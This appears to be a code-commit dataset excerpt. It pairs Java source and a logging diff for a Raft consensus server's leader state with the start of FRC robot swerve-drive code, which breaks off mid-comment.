Collection<Member> members = context.getCluster().members(); members.add(new ServerMember(member.type(), member.serverAddress(), member.clientAddress(), Instant.now())); CompletableFuture<JoinResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ReconfigureResponse> reconfigure(final ReconfigureRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the promote requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is not a known member of the cluster, fail the promotion. ServerMember existingMember = context.getClusterState().member(request.member().id()); if (existingMember == null) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } // If the configuration request index is less than the last known configuration index for // the leader, fail the request to ensure servers can't reconfigure an old configuration. if (request.index() > 0 && request.index() < context.getClusterState().getConfiguration().index() || request.term() != context.getClusterState().getConfiguration().term() && (existingMember.type() != request.member().type() || existingMember.status() != request.member().status())) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.CONFIGURATION_ERROR) .build())); } Member member = request.member(); // If the client address is being set or has changed, update the configuration. if (member.clientAddress() != null && (existingMember.clientAddress() == null || !existingMember.clientAddress().equals(member.clientAddress()))) { existingMember.update(member.clientAddress(), Instant.now()); } // Update the member type. 
existingMember.update(request.member().type(), Instant.now()); Collection<Member> members = context.getCluster().members(); CompletableFuture<ReconfigureResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<LeaveResponse> leave(final LeaveRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the leaving member is not a known member of the cluster, complete the leave successfully. if (context.getCluster().member(request.member().id()) == null) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); Collection<Member> members = context.getCluster().members(); members.remove(member); CompletableFuture<LeaveResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<PollResponse> poll(final PollRequest request) { logRequest(request); // If a member sends a PollRequest to the leader, that indicates that it likely healed from // a network partition and may have had its status set to UNAVAILABLE by the leader. In order // to ensure heartbeats are immediately stored to the member, update its status if necessary. 
ServerMember member = context.getClusterState().getRemoteMember(request.candidate()); if (member != null && member.status() == Member.Status.UNAVAILABLE) { member.update(Member.Status.AVAILABLE, Instant.now()); configure(context.getCluster().members()); } return CompletableFuture.completedFuture(logResponse(PollResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withAccepted(false) .build())); } @Override public CompletableFuture<VoteResponse> vote(final VoteRequest request) { if (updateTermAndLeader(request.term(), 0)) { LOGGER.debug("{} - Received greater term", context.getCluster().member().address()); context.transition(CopycatServer.State.FOLLOWER); return super.vote(request); } else { logRequest(request); return CompletableFuture.completedFuture(logResponse(VoteResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withVoted(false) .build())); } } @Override public CompletableFuture<AppendResponse> append(final AppendRequest request) { context.checkThread(); if (updateTermAndLeader(request.term(), request.leader())) { CompletableFuture<AppendResponse> future = super.append(request); context.transition(CopycatServer.State.FOLLOWER); return future; } else if (request.term() < context.getTerm()) { logRequest(request); return CompletableFuture.completedFuture(logResponse(AppendResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withSucceeded(false) .withLogIndex(context.getLog().lastIndex()) .build())); } else { context.setLeader(request.leader()).transition(CopycatServer.State.FOLLOWER); return super.append(request); } } @Override public CompletableFuture<CommandResponse> command(final CommandRequest request) { context.checkThread(); logRequest(request); // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(request.session()); if (session == null) { return CompletableFuture.completedFuture(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } ComposableFuture<CommandResponse> future = new ComposableFuture<>(); sequenceCommand(request, session, future); return future; } /** * Sequences the given command to the log. */ private void sequenceCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { // If the command is LINEARIZABLE and the session's current sequence number is less then one prior to the request // sequence number, queue this request for handling later. We want to handle command requests in the order in which // they were sent by the client. Note that it's possible for the session sequence number to be greater than the request // sequence number. In that case, it's likely that the command was submitted more than once to the // cluster, and the command will be deduplicated once applied to the state machine. if (request.sequence() > session.nextRequestSequence()) { // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. // The client should resubmit a request that fails with a COMMAND_ERROR. 
if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { future.complete(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.COMMAND_ERROR) .build())); } // Register the request in the request queue if it's not too far ahead of the current sequence number. else { session.registerRequest(request.sequence(), () -> applyCommand(request, session, future)); } } else { applyCommand(request, session, future); } } /** * Applies the given command to the log. */ private void applyCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { final Command command = request.command(); final long term = context.getTerm(); final long timestamp = System.currentTimeMillis(); final long index; // Create a CommandEntry and append it to the log. try (CommandEntry entry = context.getLog().create(CommandEntry.class)) { entry.setTerm(term) .setSession(request.session()) .setTimestamp(timestamp) .setSequence(request.sequence()) .setCommand(command); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Replicate the command to followers. appendCommand(index, future); // Set the last processed request for the session. This will cause sequential command callbacks to be executed. session.setRequestSequence(request.sequence()); } /** * Sends append requests for a command to followers. */ private void appendCommand(long index, CompletableFuture<CommandResponse> future) { appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { applyCommand(index, future); } else { future.complete(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); } /** * Applies a command to the state machine. */ private void applyCommand(long index, CompletableFuture<CommandResponse> future) { context.getStateMachine().<ServerStateMachine.Result>apply(index).whenComplete((result, error) -> { if (isOpen()) { completeOperation(result, CommandResponse.builder(), error, future); } }); } @Override public CompletableFuture<QueryResponse> query(final QueryRequest request) { Query query = request.query(); final long timestamp = System.currentTimeMillis(); context.checkThread(); logRequest(request); QueryEntry entry = context.getLog().create(QueryEntry.class) .setIndex(request.index()) .setTerm(context.getTerm()) .setTimestamp(timestamp) .setSession(request.session()) .setSequence(request.sequence()) .setQuery(query); return query(entry).thenApply(this::logResponse); } /** * Applies the given query entry to the state machine according to the query's consistency level. */ private CompletableFuture<QueryResponse> query(QueryEntry entry) { Query.ConsistencyLevel consistency = entry.getQuery().consistency(); if (consistency == null) return queryLinearizable(entry); switch (consistency) { case SEQUENTIAL: return queryLocal(entry); case LINEARIZABLE_LEASE: return queryBoundedLinearizable(entry); case LINEARIZABLE: return queryLinearizable(entry); default: throw new IllegalStateException("unknown consistency level"); } } /** * Executes a bounded linearizable query. * <p> * Bounded linearizable queries succeed as long as this server remains the leader. This is possible * since the leader will step down in the event it fails to contact a majority of the cluster. 
*/ private CompletableFuture<QueryResponse> queryBoundedLinearizable(QueryEntry entry) { return sequenceAndApply(entry); } /** * Executes a linearizable query. * <p> * Linearizable queries are first sequenced with commands and then applied to the state machine. Once * applied, we verify the node's leadership prior to responding successfully to the query. */ private CompletableFuture<QueryResponse> queryLinearizable(QueryEntry entry) { return sequenceAndApply(entry) .thenCompose(response -> appender.appendEntries() .thenApply(index -> response) .exceptionally(error -> QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.QUERY_ERROR) .build())); } /** * Sequences and applies the given query entry. */ private CompletableFuture<QueryResponse> sequenceAndApply(QueryEntry entry) { // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(entry.getSession()); if (session == null) { return CompletableFuture.completedFuture(logResponse(QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } CompletableFuture<QueryResponse> future = new CompletableFuture<>(); // If the query's sequence number is greater than the session's current sequence number, queue the request for // handling once the state machine is caught up. if (entry.getSequence() > session.getCommandSequence()) { session.registerSequenceQuery(entry.getSequence(), () -> applyQuery(entry, future)); } else { applyQuery(entry, future); } return future; } @Override public CompletableFuture<RegisterResponse> register(RegisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; // If the client submitted a session timeout, use the client's timeout, otherwise use the configured // default server session timeout. final long timeout; if (request.timeout() != 0) { timeout = request.timeout(); } else { timeout = context.getSessionTimeout().toMillis(); } context.checkThread(); logRequest(request); // The timeout is logged in the RegisterEntry to ensure that all nodes see a consistent timeout for the session. 
try (RegisterEntry entry = context.getLog().create(RegisterEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(timestamp) .setClient(request.client()) .setTimeout(timeout); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<RegisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionId, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.OK) .withSession((Long) sessionId) .withTimeout(timeout) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ConnectResponse> connect(ConnectRequest request, Connection connection) { context.checkThread(); logRequest(request); // Associate the connection with the appropriate client. 
context.getStateMachine().executor().context().sessions().registerConnection(request.client(), connection); return CompletableFuture.completedFuture(ConnectResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())) .build()) .thenApply(this::logResponse); } @Override public CompletableFuture<KeepAliveResponse> keepAlive(KeepAliveRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (KeepAliveEntry entry = context.getLog().create(KeepAliveEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setCommandSequence(request.commandSequence()) .setEventIndex(request.eventIndex()) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<KeepAliveResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionResult, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<UnregisterResponse> unregister(UnregisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setExpired(false) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<UnregisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { 
context.getStateMachine().apply(index).whenComplete((unregisterResult, unregisterError) -> { if (isOpen()) { if (unregisterError == null) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.OK) .build())); } else if (unregisterError instanceof CompletionException && unregisterError.getCause() instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError.getCause()).getType()) .build())); } else if (unregisterError instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError).getType()) .build())); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } /** * Cancels the append timer. */ private void cancelAppendTimer() { if (appendTimer != null) { LOGGER.debug("{} - Cancelling append timer", context.getCluster().member().address()); appendTimer.cancel(); } } /** * Ensures the local server is not the leader. */ private void stepDown() { if (context.getLeader() != null && context.getLeader().equals(context.getCluster().member())) { context.setLeader(0); } } @Override public synchronized CompletableFuture<Void> close() { return super.close() .thenRun(appender::close) .thenRun(this::cancelAppendTimer) .thenRun(this::stepDown); } }
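The command path above depends on per-session request sequencing: a command whose sequence number is ahead of the session's next expected sequence is parked (via registerRequest) and replayed once the earlier commands arrive, while requests too far ahead are rejected with COMMAND_ERROR. Below is a minimal, self-contained sketch of that ordering idea; SequencedExecutor is a hypothetical class, not part of Copycat, and it omits the MAX_REQUEST_QUEUE_SIZE bound and the deduplication handled by the real ServerSessionContext.

import java.util.HashMap;
import java.util.Map;

// Minimal sketch: run callbacks strictly in sequence order, parking any
// callback that arrives before its predecessors have run.
class SequencedExecutor {
  private final Map<Long, Runnable> pending = new HashMap<>();
  private long nextSequence = 1;

  // Called when a request with the given sequence number arrives.
  synchronized void submit(long sequence, Runnable task) {
    if (sequence == nextSequence) {
      task.run();
      nextSequence++;
      // Drain any parked tasks that are now in order.
      Runnable next;
      while ((next = pending.remove(nextSequence)) != null) {
        next.run();
        nextSequence++;
      }
    } else if (sequence > nextSequence) {
      pending.put(sequence, task); // park the out-of-order request
    }
    // sequence < nextSequence: a duplicate; the state machine deduplicates it.
  }
}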
Ensure command responses are logged.
server/src/main/java/io/atomix/copycat/server/state/LeaderState.java
Ensure command responses are logged.
<ide><path>erver/src/main/java/io/atomix/copycat/server/state/LeaderState.java <ide> <ide> ComposableFuture<CommandResponse> future = new ComposableFuture<>(); <ide> sequenceCommand(request, session, future); <del> return future; <add> return future.thenApply(this::logResponse); <ide> } <ide> <ide> /** <ide> // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. <ide> // The client should resubmit a request that fails with a COMMAND_ERROR. <ide> if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { <del> future.complete(logResponse(CommandResponse.builder() <add> future.complete(CommandResponse.builder() <ide> .withStatus(Response.Status.ERROR) <ide> .withError(CopycatError.Type.COMMAND_ERROR) <del> .build())); <add> .build()); <ide> } <ide> // Register the request in the request queue if it's not too far ahead of the current sequence number. <ide> else { <ide> if (commitError == null) { <ide> applyCommand(index, future); <ide> } else { <del> future.complete(logResponse(CommandResponse.builder() <add> future.complete(CommandResponse.builder() <ide> .withStatus(Response.Status.ERROR) <ide> .withError(CopycatError.Type.INTERNAL_ERROR) <del> .build())); <add> .build()); <ide> } <ide> } <ide> });
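The diff above stops calling logResponse inside the individual completion branches and instead applies it once, via thenApply, on the future returned from command(), so every completion path, including errors completed deep inside sequenceCommand and appendCommand, is logged exactly once. A minimal, self-contained sketch of that pattern follows; the class and method names here are illustrative, not Copycat's.

import java.util.concurrent.CompletableFuture;

// Sketch: helpers complete the future with raw responses, and logging is
// applied exactly once at the boundary where the future is returned.
public class LogAtBoundaryExample {
    public static void main(String[] args) {
        CompletableFuture<String> future = new CompletableFuture<>();
        // Some asynchronous path eventually completes the future.
        future.complete("OK");
        // The logResponse-style mapping happens once, on the returned future.
        future.thenApply(LogAtBoundaryExample::logResponse)
              .thenAccept(System.out::println);
    }

    private static String logResponse(String response) {
        System.out.println("response: " + response);
        return response;
    }
}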
Java
apache-2.0
4602fa36bed7c2f79e56d5baa701517459461ee3
0
Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush,Robolopes/RecycleRush
package org.usfirst.frc.team2339.Barracuda; /* * Add a swerve mode to RobotDrive * Code from Chief Delphi: http://www.chiefdelphi.com/forums/showthread.php?t=117099 */ import org.usfirst.frc.team2339.Barracuda.RobotMap.SwerveMap; //import com.sun.squawk.util.MathUtils; import java.lang.Math; import edu.wpi.first.wpilibj.DoubleSolenoid; import edu.wpi.first.wpilibj.Encoder; import edu.wpi.first.wpilibj.PIDController; import edu.wpi.first.wpilibj.PIDOutput; import edu.wpi.first.wpilibj.PIDSource; import edu.wpi.first.wpilibj.RobotDrive; import edu.wpi.first.wpilibj.SpeedController; import edu.wpi.first.wpilibj.Talon; import edu.wpi.first.wpilibj.smartdashboard.SmartDashboard; /** * * */ public class SwerveDrive extends RobotDrive { //declare the steering pods and shifter valve public static final int frontLeft = MotorType.kFrontLeft.value; public static final int frontRight = MotorType.kFrontRight.value; public static final int rearLeft = MotorType.kRearLeft.value; public static final int rearRight = MotorType.kRearRight.value; protected SpeedController speedControllers[] = new SpeedController[kMaxNumberOfMotors]; protected Pod wheelPods[] = new Pod[kMaxNumberOfMotors]; private DoubleSolenoid shift; public class WheelData { public double wheelSpeeds[] = new double[kMaxNumberOfMotors]; public double wheelAngles[] = new double[kMaxNumberOfMotors]; public WheelData() { // Initialize data for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 0; } } /** * Set speed and angle values when joystick in dead band */ public void setDeadBandValues() { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelSpeeds[iiWheel] = 0; wheelAngles[iiWheel] = 45; } wheelAngles[frontRight] = -45; wheelAngles[rearLeft] = -45; } } public SwerveDrive() { super(SwerveMap.PWM.DRIVE_FRONT_LEFT, SwerveMap.PWM.DRIVE_REAR_LEFT, SwerveMap.PWM.DRIVE_FRONT_RIGHT, SwerveMap.PWM.DRIVE_REAR_RIGHT); speedControllers[frontLeft] = new Talon(SwerveMap.PWM.DRIVE_FRONT_LEFT_STEERING); speedControllers[frontRight] = new Talon(SwerveMap.PWM.DRIVE_FRONT_RIGHT_STEERING); speedControllers[rearLeft] = new Talon(SwerveMap.PWM.DRIVE_REAR_LEFT_STEERING); speedControllers[rearRight] = new Talon(SwerveMap.PWM.DRIVE_REAR_RIGHT_STEERING); //set up the steering pods with the correct sensors and controllers shift = new DoubleSolenoid(SwerveMap.Solenoid.DRIVE_SHIFT_HIGH, SwerveMap.Solenoid.DRIVE_SHIFT_LOW); wheelPods[frontLeft] = new Pod(m_frontLeftMotor, speedControllers[frontLeft], SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_LEFT_ENC_B, 1); wheelPods[frontRight] = new Pod(m_frontRightMotor, speedControllers[frontRight], SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_FRONT_RIGHT_ENC_B, 2); wheelPods[rearLeft] = new Pod(m_rearLeftMotor, speedControllers[rearLeft], SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_A, SwerveMap.DIO.DRIVE_REAR_LEFT_ENC_B, 3); wheelPods[rearRight] = new Pod(m_rearRightMotor, speedControllers[rearRight], SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_A, SwerveMap.DIO.DRIVE_REAR_RIGHT_ENC_B, 4); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * Most swerve code assumes the pivot point for rotation is the center of the wheels (i.e. 
center of rectangle with wheels as corners) * This calculation is generalized based on pivot being offset from rectangle center. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @param xPivotOffset Amount pivot is offset sideways from center. (Positive toward right, negative toward left) * @param yPivotOffset Amount pivot is offset forward from center. (Positive toward front, negative toward back) * @return raw wheel speeds and angles */ public WheelData calculateRawWheelDataGeneral(double xVelocity, double yVelocity, double rotateVelocity, double xPivotOffset, double yPivotOffset) { WheelData rawWheelData = new WheelData(); double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH; double frontDist = L/2 - xPivotOffset; double rearDist = L/2 + xPivotOffset; double rightDist = W/2 - yPivotOffset; double leftDist = W/2 + yPivotOffset; // Find maximum wheel distance (radius) from center // Maximum radius is used to normalize rotational velocity so that wheels farthest from center move the fastest. double xMax = Math.max(rightDist, leftDist); double yMax = Math.max(frontDist, rearDist); double rMax = Math.hypot(xMax, yMax); double xDist = 0; double yDist = 0; double xWheel = 0; double yWheel = 0; xDist = rightDist; yDist = frontDist; xWheel = xVelocity + rotateVelocity * yDist / rMax; yWheel = yVelocity - rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[frontRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = frontDist; xWheel = xVelocity + rotateVelocity * yDist / rMax; yWheel = yVelocity + rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = leftDist; yDist = rearDist; xWheel = xVelocity - rotateVelocity * yDist / rMax; yWheel = yVelocity + rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(xWheel, yWheel)); xDist = rightDist; yDist = rearDist; xWheel = xVelocity - rotateVelocity * yDist / rMax; yWheel = yVelocity - rotateVelocity * xDist / rMax; rawWheelData.wheelSpeeds[rearRight] = Math.hypot(xWheel, yWheel); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(xWheel, yWheel)); normalize(rawWheelData.wheelSpeeds); return rawWheelData; } /** * NOTE: This should give same result as standard method below. * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. 
* @return raw wheel speeds and angles */ public WheelData calculateRawWheelData1(double xVelocity, double yVelocity, double rotateVelocity) { return calculateRawWheelDataGeneral(xVelocity, yVelocity, rotateVelocity, 0.0, 0.0); } /** * Calculate raw wheel speeds and angles for swerve drive based on input robot forward, strafe, and rotational velocities. * Wheel speeds are normalized to the range [0, 1.0]. Angles are normalized to the range [-180, 180). * Calculated values are raw in that they have no consideration for current state of drive. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. * @return raw wheel speeds and angles */ public WheelData calculateRawWheelData(double xVelocity, double yVelocity, double rotateVelocity) { WheelData rawWheelData = new WheelData(); //calculate angle/speed setpoints using wheel dimensions from SwerveMap double L = SwerveMap.Constants.WHEEL_BASE_LENGTH; double W = SwerveMap.Constants.WHEEL_BASE_WIDTH;; double R = Math.hypot(L, W); double A = xVelocity - rotateVelocity * (L / R); double B = xVelocity + rotateVelocity * (L / R); double C = yVelocity - rotateVelocity * (W / R); double D = yVelocity + rotateVelocity * (W / R); // Find wheel speeds rawWheelData.wheelSpeeds[frontLeft] = Math.hypot(B, D); rawWheelData.wheelSpeeds[frontRight] = Math.hypot(B, C); rawWheelData.wheelSpeeds[rearLeft] = Math.hypot(A, D); rawWheelData.wheelSpeeds[rearRight] = Math.hypot(A, C); normalize(rawWheelData.wheelSpeeds); // Find steering angles rawWheelData.wheelAngles[frontLeft] = Math.toDegrees(Math.atan2(B, D)); rawWheelData.wheelAngles[frontRight] = Math.toDegrees(Math.atan2(B, C)); rawWheelData.wheelAngles[rearLeft] = Math.toDegrees(Math.atan2(A, D)); rawWheelData.wheelAngles[rearRight] = Math.toDegrees(Math.atan2(A, C)); return rawWheelData; } /** * Calculate wheel data change (delta) based on current data. * @param rawWheelData Raw wheel change data * @return wheel change data (delta) based on current wheel values */ public WheelData calculateDeltaWheelData(WheelData rawWheelData) { WheelData deltaWheelData = new WheelData(); for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { // Compute turn angle from encoder value (pidGet) and raw target value AngleFlip turnAngle = computeTurnAngle(wheelPods[iiWheel].pidGet(), rawWheelData.wheelAngles[iiWheel]); deltaWheelData.wheelAngles[iiWheel] = turnAngle.getAngle(); deltaWheelData.wheelSpeeds[iiWheel] = driveScale(turnAngle) * rawWheelData.wheelSpeeds[iiWheel]; } return deltaWheelData; } public void setPods(WheelData wheelData) { for (int iiWheel = 0; iiWheel < kMaxNumberOfMotors; iiWheel++) { wheelPods[iiWheel].setSteeringAngle(wheelData.wheelAngles[iiWheel]); wheelPods[iiWheel].setWheelSpeed(wheelData.wheelSpeeds[iiWheel]); } } /** * Drive in swerve mode with a given speed, rotation, and shift values. * Driving parameters are assumed to be relative to the current robot angle. * @param xVelocity strafe (sideways) velocity. -1.0 = max motor speed left. 1.0 = max motor speed right. * @param yVelocity forward velocity. -1.0 = max motor speed backwards. 1.0 = max motor speed forward. * @param rotateVelocity clockwise rotational velocity. -1.0 = max motor speed counter-clockwise. 1.0 = max motor speed clockwise. 
